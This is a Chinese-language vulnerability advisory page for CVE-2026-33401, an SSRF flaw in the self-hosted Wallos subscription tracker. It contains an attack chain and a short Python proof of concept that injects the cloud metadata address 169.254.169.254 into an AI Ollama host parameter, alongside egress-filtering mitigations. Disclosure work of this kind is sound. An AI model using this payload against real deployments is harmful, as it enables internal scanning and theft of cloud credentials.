IPBUF安全漏洞报告
English
CVE-2026-33401 CVSS 6.5 中危

CVE-2026-33401 Wallos服务端请求伪造漏洞

披露日期: 2026-03-24
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-33401
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Wallos

相关标签

SSRFWallosCVE-2026-33401信息泄露内网扫描

漏洞概述

Wallos是一款开源的自托管个人订阅追踪器。在4.7.0版本之前,尽管针对CVE-2026-30840实施了SSRF修补,但仍有三个关键攻击面未受保护:AI Ollama主机参数、AI推荐端点以及通知cron任务。经过身份认证的攻击者可利用这些端点提交特制URL,进而扫描内部网络、访问云厂商元数据端点或本地服务,造成高机密性风险。

技术细节

该漏洞属于服务端请求伪造(SSRF)。Wallos在修复CVE-2026-30840时,仅对通知测试端点增加了SSRF校验,但未能覆盖所有用户可控的URL参数。具体而言,攻击者可以利用AI Ollama主机配置参数、AI推荐功能接口以及后台通知cron任务中的URL输入点。由于缺乏对目标地址的有效过滤(如内网IP段、localhost、元数据IP),攻击者可以注入恶意URL(如 http://169.254.169.254/latest/meta-data/)。服务器会代为发起请求,攻击者根据响应差异判断内网服务存活状态或窃取云平台凭证。此漏洞需要低权限用户身份,且无需用户交互即可触发,严重威胁云端部署环境的机密性。

攻击链分析

STEP 1
1. 获取凭证
攻击者注册或获取一个低权限的Wallos账户(PR:L)。
STEP 2
2. 构造Payload
攻击者构造包含内网IP或云元数据IP(如169.254.169.254)的恶意URL。
STEP 3
3. 发送请求
攻击者向未受保护的AI Ollama参数、AI推荐或Cron端点发送包含恶意URL的请求。
STEP 4
4. 服务端请求
Wallos服务器解析请求并代为访问攻击者指定的内网地址。
STEP 5
5. 信息泄露
攻击者根据服务器返回的响应内容,获取内网服务信息或云环境凭证。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL for Wallos instance target = "http://<WALLOS_HOST>" # Authenticated session cookie (Required as PR:L) cookies = {'PHPSESSID': 'valid_session_id'} # SSRF Payload targeting AWS IMDSv1 # Can be injected into AI Ollama host parameter or AI recommendations endpoint ssrf_payload = "http://169.254.169.254/latest/meta-data/ami-id" # Example payload structure for the vulnerable AI endpoint # Note: Exact parameter names may vary based on the specific endpoint implementation payload_data = { "ollama_host": ssrf_payload # Vulnerable parameter mentioned in advisory } # Sending the request to the vulnerable endpoint response = requests.post(f"{target}/api/settings/ai", json=payload_data, cookies=cookies) if response.status_code == 200: print("[+] Potential SSRF triggered.") print(f"[+] Response: {response.text}") else: print("[-] Exploit attempt failed.")

影响范围

Wallos < 4.7.0

防御指南

临时缓解措施
如果无法立即升级,建议通过网络ACL或安全组限制Wallos服务器的出站流量,仅允许必要的白名单域名(如支付网关)。同时,严格禁止访问RFC 1918定义的私有IP地址(10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16)和链路本地地址(169.254.0.0/16),以防止SSRF攻击。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表